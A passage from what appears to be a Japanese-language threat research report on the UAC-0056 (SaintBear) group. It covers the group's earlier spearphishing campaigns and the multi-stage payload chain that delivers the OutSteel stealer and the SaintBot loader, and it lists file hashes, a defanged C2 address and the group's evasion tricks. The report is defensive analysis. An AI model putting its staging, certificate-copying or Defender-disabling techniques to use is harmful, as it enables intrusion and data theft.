id=\"links-to-prior-attacks\"><\/a>\u904e\u53bb\u306e\u653b\u6483\u3068\u306e\u95a2\u9023<\/h2>\n<p><a href=\"https:\/\/cert.gov.ua\/article\/18273\">CERT-UA<\/a>\u306f\u3053\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092UAC-0056\u3068\u3044\u3046\u540d\u524d\u3067\u8ffd\u8de1\u3057\u3066\u3044\u308b\u3068\u8ff0\u3079\u3066\u3044\u307e\u3059\u3002\u4ed6\u306e\u7d44\u7e54\u3067\u306f<a href=\"https:\/\/www.proofpoint.com\/us\/daily-ruleset-update-summary-20210511\">TA471<\/a>\u3001<a href=\"https:\/\/report.threatbook.cn\/ST.pdf\">SaintBear<\/a>\u3001<a href=\"https:\/\/nsfocusglobal.com\/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government\/\">Lorec53<\/a>\u306e\u540d\u524d\u3067\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u3092\u8ffd\u8de1\u3057\u3066\u3044\u307e\u3059\u3002\u79c1\u305f\u3061\u306e\u8abf\u67fb\u3067\u306f\u3001\u3053\u308c\u3089\u306e\u653b\u6483\u304c\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u5185\u30fb\u30b8\u30e7\u30fc\u30b8\u30a2\u5185\u306e\u4ed6\u306e\u7d44\u7e54\u3084\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u5185\u306e\u4ed6\u56fd\u8cc7\u7523\u306b\u7684\u3092\u3057\u307c\u3063\u305f\u904e\u53bb\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3068\u6570\u3005\u306e\u91cd\u8907\u304c\u898b\u3089\u308c\u308b\u3053\u3068\u304c\u5206\u304b\u3063\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u91cd\u8907\u306b\u306f\u3001SaintBot\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u3084\u5171\u6709\u30a4\u30f3\u30d5\u30e9\u306a\u3069\u306e\u5171\u901a\u8981\u7d20\u304c\u542b\u307e\u308c\u307e\u3059\u3002\u56f33\u306f\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u65e2\u77e5\u306e\u653b\u6483\u3092\u6642\u7cfb\u5217\u3067\u793a\u3057\u305f\u3082\u306e\u3067\u3059\u3002\u5177\u4f53\u7684\u306b\u306f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306e\u9001\u4fe1\u65e5\u3068\u5404\u30e1\u30fc\u30eb\u306e\u4ef6\u540d\u3092\u8a18\u8f09\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122155\" aria-describedby=\"caption-attachment-122155\" style=\"width: 901px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-26-jp.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-122155 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-26-jp.png\" alt=\"UAC-0056\u306b\u95a2\u9023\u3059\u308b\u65e2\u77e5\u306e\u653b\u6483\u306e\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u3002\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306e\u9001\u4fe1\u65e5\u3068\u305d\u306e\u4ef6\u540d\u3092\u793a\u3057\u305f\u3082\u306e\" width=\"901\" height=\"247\" \/><\/a><figcaption id=\"caption-attachment-122155\" class=\"wp-caption-text\">0056\u306b\u95a2\u9023\u3059\u308b\u65e2\u77e5\u306e\u653b\u6483\u306e\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u3002\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306e\u9001\u4fe1\u65e5\u3068\u305d\u306e\u4ef6\u540d\u3092\u793a\u3057\u305f\u3082\u306e<\/figcaption><\/figure>\n<p>\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u3092\u898b\u308b\u3068\u30012021\u5e744\u6708\u304b\u30897\u6708\u306b\u304b\u3051\u3066\u3001\u8907\u6570\u306e\u653b\u6483\u304c\u884c\u308f\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u30022021\u5e74\u306e\u653b\u6483\u30682022\u5e74\u306b\u89b3\u6e2c\u3055\u308c\u305f\u653b\u6483\u3068\u306e\u9593\u306b\u306f\u3001\u6570\u30f6\u6708\u9593\u306e\u7a7a\u304d\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u306e\u7a7a\u304d\u306f\u6d3b\u52d5\u306e\u4f11\u6b62\u3067\u306f\u306a\u304f\u5358\u306b\u898b\u3048\u3066\u3044\u306a\u3044\u3060\u3051\u3068\u601d\u308f\u308c\u307e\u3059\u3002\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u4e0a\u3001\u4e00\u898b\u4f11\u6b62\u3057\u3066\u3044\u308b\u3088\u3046\u306b\u898b\u3048\u308b\u671f\u9593\u3082\u8ffd\u52a0\u306e\u653b\u6483\u304c\u884c\u308f\u308c\u305f\u3053\u3068\u3092\u793a\u5506\u3059\u308b\u914d\u5e03\u6587\u66f8\u3084\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u8a8d\u8b58\u3055\u308c\u3066\u3044\u308b\u306e\u3067\u3001\u5f53\u8a72\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u3053\u306e\u671f\u9593\u3082\u6d3b\u52d5\u3092\u4f11\u6b62\u3057\u3066\u3044\u306a\u304b\u3063\u305f\u3082\u306e\u3068\u79c1\u305f\u3061\u306f\u8003\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>UAC-0056 \u3068\u95a2\u9023\u3057\u3066\u3044\u308b\u4ee5\u524d\u306e\u65e2\u77e5\u306e\u653b\u6483\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001<a href=\"#appendix-a-prior-attacks-associated-with-uac-0056\">\u4ed8\u9332 A<\/a>\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u4ed8\u9332\u3067\u8aac\u660e\u3057\u305f\u653b\u6483\u306b\u306f\u4ee5\u4e0b\u304c\u542b\u307e\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li><a href=\"#march-2021-attacks\">2021\u5e743\u6708<\/a>: Bitcoin\u3068\u65b0\u578b\u30b3\u30ed\u30ca\u30a6\u30a4\u30eb\u30b9\u611f\u67d3\u75c7(COVID)\u3092\u30c6\u30fc\u30de\u3068\u3059\u308b\u30b8\u30e7\u30fc\u30b8\u30a2\u56fd\u5185\u306e\u6a19\u7684\u306b\u5bfe\u3059\u308b\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3<\/li>\n<li><a href=\"#april-2021-attacks\">2021\u5e744\u6708<\/a>: \u30a6\u30af\u30e9\u30a4\u30ca\u653f\u5e9c\u6a5f\u95a2\u3092\u6a19\u7684\u3068\u3059\u308bBitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb<\/li>\n<li><a href=\"#may-2021-attacks\">2021\u5e745\u6708<\/a>: \u30a6\u30af\u30e9\u30a4\u30ca\u653f\u5e9c\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3059\u308b\u6cd5\u57f7\u884c\u6a5f\u95a2\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483<\/li>\n<li><a href=\"#june-2021-attacks\">2021\u5e746\u6708<\/a>: \u30a6\u30af\u30e9\u30a4\u30ca\u653f\u5e9c\u7d44\u7e54\u306b\u5bfe\u3059\u308b\u6cd5\u57f7\u884c\u6a5f\u95a2\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483<\/li>\n<li><a href=\"#july-2021-targeting\">2021\u5e747\u6708<\/a>: \u30a6\u30af\u30e9\u30a4\u30ca\u306e\u897f\u5074\u653f\u5e9c\u6a5f\u95a2\u306b\u5bfe\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u8a66\u884c<\/li>\n<\/ul>\n<h2><a id=\"payload-analysis-for-feb-2-attack\"><\/a>2\u67082\u65e5\u306e\u653b\u6483\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u89e3\u6790<\/h2>\n<p>\u4e0a\u8a18\u56f32\u306b\u793a\u3057\u305f\u3068\u304a\u308a\u3001\u3053\u306e\u30a2\u30af\u30bf\u30fc\u306fDiscord\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u914d\u4fe1\u30cd\u30c3\u30c8\u30ef\u30fc\u30af(CDN)\u3092\u5229\u7528\u3057\u3066\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30db\u30b9\u30c8\u3057\u3066\u3044\u307e\u3059\u304c\u3001\u3053\u308c\u306f\u540c\u8105\u5a01\u653b\u6483\u30b0\u30eb\u30fc\u30d7\u304c\u6570\u591a\u304f\u306e\u653b\u6483\u3067\u4f7f\u3063\u3066\u3044\u308b\u624b\u53e3\u3067\u3059\u3002Discord\u306e\u30b5\u30fc\u30d0\u30fc\u306f\u30b2\u30fc\u30e0\u3084\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30b0\u30eb\u30fc\u30d7\u306a\u3069\u306e\u5408\u6cd5\u7528\u9014\u3067\u3082\u4eba\u6c17\u304c\u3042\u308b\u3053\u3068\u304b\u3089\u3001\u591a\u304f\u306eURL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0\u30b7\u30b9\u30c6\u30e0\u3067\u3053\u306e\u30c9\u30e1\u30a4\u30f3\u3078\u306e\u4fe1\u983c\u5ea6\u304c\u9ad8\u304f\u3001Discord\u306e\u5229\u7528\u306f\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u306b\u3068\u3063\u3066\u6709\u76ca\u3067\u3059\u3002Discord\u306f\u5229\u7528\u898f\u7d04\u3067CDN\u306e\u4e0d\u6b63\u5229\u7528\u3092\u7981\u6b62\u3057\u3066\u304a\u308a\u3001\u540c\u793e\u306f\u81ea\u793e\u30d7\u30e9\u30c3\u30c8\u30d5\u30a9\u30fc\u30e0\u306e\u60aa\u7528\u306e\u767a\u898b\u30fb\u30d6\u30ed\u30c3\u30af\u306b\u52aa\u3081\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u653b\u6483\u3067\u306f\u3001\u3053\u306e Discord \u306e URL \u304c\u30ed\u30fc\u30c0\u3067\u3042\u308b\u60aa\u610f\u306e\u3042\u308b\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb (SHA256:<span style=\"font-family: 'courier new', courier, monospace;\">f58c41d83c0f1c1e8c3bd99ab6deabb14a763b54a3c5f1e821210c0536c3ff<\/span>) \u3092\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30ed\u30fc\u30c0\u306f\u3001\u611f\u67d3\u30c1\u30a7\u30fc\u30f3\u5168\u4f53\u306e\u8907\u6570\u306e\u30b9\u30c6\u30fc\u30b8\u306e\u3046\u3061\u6700\u521d\u306e\u30b9\u30c6\u30fc\u30b8\u3068\u3057\u3066\u6a5f\u80fd\u3059\u308b\u3082\u306e\u3067\u3001\u305d\u308c\u305e\u308c\u306e\u30b9\u30c6\u30fc\u30b8\u304c\u3055\u307e\u3056\u307e\u306a\u30ec\u30d9\u30eb\u306e\u8907\u96d1\u6027\u3092\u6301\u3063\u3066\u3044\u307e\u3059\u3002\u6700\u7d42\u7684\u306b\u3053\u306e\u611f\u67d3\u30c1\u30a7\u30fc\u30f3\u306f\u3001OutSteel\u3068\u547c\u3070\u308c\u308b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u3001SaintBot\u3068\u547c\u3070\u308c\u308b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e\u30ed\u30fc\u30c0\u3001Windows Defender\u3092\u7121\u52b9\u306b\u3059\u308b\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u5316\u3057\u305f\u30d0\u30c3\u30c1\u30b9\u30af\u30ea\u30d7\u30c8\u3001\u6b63\u898f\u306eGoogle Chrome\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u305d\u308c\u305e\u308c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u30fb\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h3><a id=\"initial-loader\"><\/a>\u521d\u671f\u306e\u30ed\u30fc\u30c0<\/h3>\n<p>\u914d\u5e03\u6587\u66f8\u306eJavaScript\u3067\u6700\u521d\u306b\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u308b\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u306f\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u578b\u306e\u521d\u671f\u30ed\u30fc\u30c0\u3067\u3001\u4f5c\u6210\u8005\u306fOrganization(\u7d44\u7e54)\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u300cElectrum Technologies GmbH\u300d\u3092\u8a2d\u5b9a\u3057\u305f\u8a3c\u660e\u66f8(SHA1: <span style=\"font-family: 'courier new', courier, monospace;\">60aac9d079a28bd9ee0372e39f23a6a92e9236bd<\/span>)\u3067\u3053\u306e\u30ed\u30fc\u30c0\u306b\u7f72\u540d\u3092\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306f\u4ee5\u4e0b\u306b\u793a\u3059\u3068\u304a\u308a\u3001Electrum Bitcoin\u30a6\u30a9\u30ec\u30c3\u30c8(Bitcoin\u5c02\u7528\u306e\u4eee\u60f3\u901a\u8ca8\u30a6\u30a9\u30ec\u30c3\u30c8)\u3068\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">Certificate:<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 Data:<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 \u00a0 \u00a0 Version: 3 (0x2)<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 \u00a0 \u00a0 Serial Number:<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 3b:11:e7:6e:da:51:82:ce:c2:d4:e7:2d:8c:05:f6:9a<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 Signature Algorithm: sha256WithRSAEncryption<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 \u00a0 \u00a0 Issuer: C=US, O=thawte, Inc., CN=thawte SHA256 Code Signing CA - G2<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 \u00a0 \u00a0 Validity<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Not Before: May 8 00:00:00 2020 GMT<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Not After : May 8 23:59:59 2022 GMT<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u00a0 \u00a0 \u00a0 \u00a0 Subject: C=DE, ST=Berlin, L=Berlin, O=<strong>Electrum Technologies GmbH<\/strong>, CN=Electrum Technologies GmbH<\/span><\/p>\n<p>\u3053\u306e\u7b2c1\u30b9\u30c6\u30fc\u30b8\u306e\u30ed\u30fc\u30c0\u306f\u305d\u306e\u5f8c\u306b\u3064\u3065\u304f\u8907\u6570\u306e\u30b9\u30c6\u30fc\u30b8\u7528\u306e\u5358\u7d14\u306a\u30e9\u30c3\u30d1\u30fc\u3067\u3001\u3053\u308c\u3089\u306e\u5f8c\u534a\u306e\u30b9\u30c6\u30fc\u30b8\u306f\u5358\u306b\u30ea\u30bd\u30fc\u30b9\u304b\u3089DLL\u3092\u5fa9\u53f7\u3057\u3001\u30e1\u30e2\u30ea\u306b\u30ed\u30fc\u30c9\u3057\u3001\u30a8\u30f3\u30c8\u30ea\u30dd\u30a4\u30f3\u30c8\u3092\u547c\u3073\u51fa\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122081\" aria-describedby=\"caption-attachment-122081\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122082 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-27.png\" alt=\"\u5fa9\u53f7\u3055\u308c\u305fSHCore2.dll\u3092\u8aad\u307f\u8fbc\u3093\u3067\u30a8\u30f3\u30c8\u30ea\u30dd\u30a4\u30f3\u30c8\u3092\u547c\u3073\u51fa\u3059\" width=\"900\" height=\"492\" \/><figcaption id=\"caption-attachment-122081\" class=\"wp-caption-text\">\u56f34 \u5fa9\u53f7\u3055\u308c\u305fSHCore2.dll\u3092\u8aad\u307f\u8fbc\u3093\u3067\u30a8\u30f3\u30c8\u30ea\u30dd\u30a4\u30f3\u30c8\u3092\u547c\u3073\u51fa\u3059<\/figcaption><\/figure>\n<p>\u521d\u671f\u30ed\u30fc\u30c0\u306e\u30d1\u30c3\u30af\u30fb\u96e3\u8aad\u5316\u306b\u4f7f\u7528\u3055\u308c\u308b\u30d1\u30c3\u30ab\u30fc\u3092\u4f7f\u3048\u3070\u3001\u30d1\u30c3\u30ab\u30fc\u5229\u7528\u8005\u306f\u4ed6\u306e.NET\u30d0\u30a4\u30ca\u30ea\u3084\u30b3\u30d4\u30fc\u3057\u305f\u8a3c\u660e\u66f8\u304b\u3089 .NET\u30a2\u30bb\u30f3\u30d6\u30ea\u306e\u30af\u30ed\u30fc\u30f3\u3092\u4f5c\u6210\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5927\u90e8\u5206\u304c\u6b63\u898f\u30e9\u30a4\u30d6\u30e9\u30ea\u304b\u3089\u53d6\u5f97\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u3084\u3001\u6dfb\u4ed8\u3055\u308c\u3066\u3044\u308b\u306e\u304cElectrum\u306e\u8a3c\u660e\u66f8\u3067\u3042\u308b\u3053\u3068\u306b\u3064\u3044\u3066\u306f\u3053\u308c\u3067\u8aac\u660e\u304c\u3064\u304d\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">SHCore2.dll<\/span>\u3068\u3044\u3046\u540d\u524d\u306e\u5fa9\u53f7\u3055\u308c\u305fDLL\u3082\u96e3\u8aad\u5316\u3055\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u8208\u5473\u6df1\u3044\u3053\u3068\u306b\u3001\u3053\u306e\u96e3\u8aad\u5316\u30c4\u30fc\u30eb\u306f\u30af\u30e9\u30b9\u540d\u3092\u5b8c\u5168\u306b\u306f\u524a\u9664\u3057\u3066\u3044\u307e\u305b\u3093(\u56f35\u53c2\u7167)\u3002\u3053\u306e\u304a\u304b\u3052\u3067\u30b5\u30f3\u30d7\u30eb\u306e\u6a5f\u80fd\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u3059\u3070\u3084\u304f\u53ce\u96c6\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u306eDLL\u306f\u6700\u7d42\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3042\u308b\u3088\u3046\u306b\u898b\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u304c\u3001\u5b9f\u306f\u3053\u308c\u3082\u5358\u306a\u308b\u30b9\u30c6\u30fc\u30b8\u30e3\u3067\u3057\u304b\u306a\u304f\u3001\u5408\u8a08\u30674\u3064\u306e\u57cb\u3081\u8fbc\u307f\u30d0\u30a4\u30ca\u30ea\u3092\u5fa9\u53f7\u3057\u3066\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122083\" aria-describedby=\"caption-attachment-122083\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122084 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-28.png\" alt=\"SHCore2.dll \u30af\u30e9\u30b9\" width=\"900\" height=\"359\" \/><figcaption id=\"caption-attachment-122083\" class=\"wp-caption-text\">\u56f35 SHCore2.dll \u30af\u30e9\u30b9<\/figcaption><\/figure>\n<p>\u30b9\u30c6\u30fc\u30b8\u30e3\u306b\u306f\u8208\u5473\u6df1\u3044\u89e3\u6790\u9632\u6b62\u6a5f\u80fd\u304c\u3042\u308a\u3001\u4eee\u60f3\u30de\u30b7\u30f3\u5185\u3084\u3001\u5834\u5408\u306b\u3088\u3063\u3066\u306f\u30d9\u30a2\u30e1\u30bf\u30eb\u30b7\u30b9\u30c6\u30e0\u3067\u306e\u5b9f\u884c\u3082\u62d2\u5426\u3057\u307e\u3059\u3002\u305d\u306e\u305f\u3081\u52d5\u7684\u89e3\u6790\u306f\u56f0\u96e3\u306a\u306e\u3067\u3059\u304c\u3001\u5f53\u8a72\u30b5\u30f3\u30d7\u30eb\u306f\u4eee\u60f3\u30de\u30b7\u30f3\u306e\u30c1\u30a7\u30c3\u30af\u3092\u884c\u3046\u524d\u306b\u3001<span style=\"font-family: 'courier new', courier, monospace;\">Class5_Decrypter<\/span>\u30af\u30e9\u30b9\u5185\u306e\u95a2\u6570\u3092\u547c\u3073\u51fa\u3057\u3066\u304a\u308a\u3001\u3053\u308c\u304c\u57cb\u3081\u8fbc\u307e\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5fa9\u53f7\u3092\u62c5\u3063\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3092\u5229\u7528\u3057\u3066\u30b5\u30f3\u30d7\u30eb\u3092\u30c7\u30d0\u30c3\u30b0\u3057\u3066\u5fa9\u53f7\u3057\u305f\u5f8c\u3067\u305d\u308c\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u62bd\u51fa\u3067\u304d\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122085\" aria-describedby=\"caption-attachment-122085\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122086 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-29.png\" alt=\"\u5fa9\u53f7\u3057\u305f\u3082\u306e \" width=\"900\" height=\"615\" \/><figcaption id=\"caption-attachment-122085\" class=\"wp-caption-text\">\u56f36 SHCore2.dll\u306e\u30e1\u30e2\u30ea\u5185\u306econfig\u30d5\u30a1\u30a4\u30eb\u3092\u5fa9\u53f7\u3057\u305f\u3082\u306e<\/figcaption><\/figure>\n<p>\u30b9\u30c6\u30fc\u30b8\u30e3\u304c\u5fa9\u53f7\u30fb\u5b9f\u884c\u3059\u308b\u57cb\u3081\u8fbc\u307f\u30d0\u30a4\u30ca\u30ea\u306f\u3001OutSteel\u3001SaintBot\u3001Windows Defender\u306e\u7121\u52b9\u5316\u3092\u884c\u3046\u30d0\u30c3\u30c1\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3059\u308b\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3001Google Chrome\u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30e9\u306e4\u3064\u3067\u3059(\u88681\u53c2\u7167)\u3002<\/p>\n<table style=\"width: 101.472%;\">\n<tbody>\n<tr>\n<td style=\"width: 50.5051%;\"><b>SHA256<\/b><\/td>\n<td style=\"width: 78.0533%;\"><b>\u8aac\u660e<\/b><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 50.5051%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">7e3c54abfbb2abf2025ccf05674dd10240678e5ada465bb0c04a9109fe46e7ec<\/span><\/td>\n<td style=\"width: 78.0533%;\"><span style=\"font-weight: 400;\">OutSteel AutoIT \u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c0<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 50.5051%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">0da1f48eaa7956dda58fa10af106af440adb9e684228715d313bb0d66d7cc21d<\/span><\/td>\n<td style=\"width: 78.0533%;\"><span style=\"font-weight: 400;\">Windows Defender\u3092\u7121\u52b9\u5316\u3059\u308b\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb\u3092\u30c9\u30ed\u30c3\u30d7\u3059\u308bPureBasic\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 50.5051%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">0f9f31bbc69c8174b492cf177c2fbaf627fcdb5ac4473ca5589aa2be75cee735<\/span><\/td>\n<td style=\"width: 78.0533%;\"><span style=\"font-weight: 400;\">\u6b63\u898fGoogle Chrome\u30a4\u30f3\u30b9\u30c8\u30fc\u30e9<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 50.5051%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">82d2779e90cbc9078aa70d7dc6957ff0d6d06c127701c820971c9c572ba3058e<\/span><\/td>\n<td style=\"width: 78.0533%;\"><span style=\"font-weight: 400;\">SaintBot .NET \u30ed\u30fc\u30c0<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"color: #999999;\"><sup>\u88681 \u30ed\u30fc\u30c0\u5185\u306b\u57cb\u3081\u8fbc\u307e\u308c\u305f\u30d0\u30a4\u30ca\u30ea<\/sup><\/span><\/p>\n<h3><a id=\"additional-files-associated-with-the-attack\"><\/a>\u653b\u6483\u306b\u95a2\u9023\u3059\u308b\u8ffd\u52a0\u30d5\u30a1\u30a4\u30eb<\/h3>\n<p>\u4ee5\u4e0b\u306f\u3001\u6700\u521d\u306e\u30ed\u30fc\u30c0\u304c\u5b9f\u884c\u3055\u308c\u305f\u5f8c\u306b\u767b\u5834\u3059\u308b4\u3064\u306e\u8ffd\u52a0\u30d5\u30a1\u30a4\u30eb\u3092\u3055\u3089\u306b\u8a73\u7d30\u306b\u5206\u6790\u3057\u305f\u3082\u306e\u3067\u3059\u3002<\/p>\n<h4>OutSteel<\/h4>\n<p>OutSteel\u306f\u30b9\u30af\u30ea\u30d7\u30c8\u8a00\u8a9eAutoIT\u3067\u958b\u767a\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c0\u517c\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u3067\u3059\u3002OutSteel\u306f\u88681\u306b\u793a\u3057\u305f\u4ed6\u306e\u30d0\u30a4\u30ca\u30ea\u3068\u3068\u3082\u306b\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u307e\u305a\u30ed\u30fc\u30ab\u30eb\u30c7\u30a3\u30b9\u30af\u3092\u30b9\u30ad\u30e3\u30f3\u3057\u3066\u7279\u5b9a\u306e\u62e1\u5f35\u5b50\u3092\u6301\u3064\u30d5\u30a1\u30a4\u30eb\u3092\u63a2\u3057\u3001\u305d\u308c\u3089\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30b3\u30de\u30f3\u30c9\uff06\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb(C2)\u30b5\u30fc\u30d0\u30fc\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u306f\u3001\u63a5\u7d9a\u5148C2\u30b5\u30fc\u30d0\u30fc\u306f<span style=\"font-family: 'courier new', courier, monospace;\">185[.]244[.]41[.]109:8080<\/span>\u3067\u3001\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u306f<span style=\"font-family: 'courier new', courier, monospace;\">\/upld\/<\/span>\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122087\" aria-describedby=\"caption-attachment-122087\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122088 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-30.png\" alt=\"OutSteel\u306e\u4e3b\u90e8\u3068\u306a\u308b\u30d5\u30a1\u30a4\u30eb\u691c\u7d22\u30eb\u30fc\u30d7\" width=\"900\" height=\"205\" \/><figcaption id=\"caption-attachment-122087\" class=\"wp-caption-text\">\u56f37 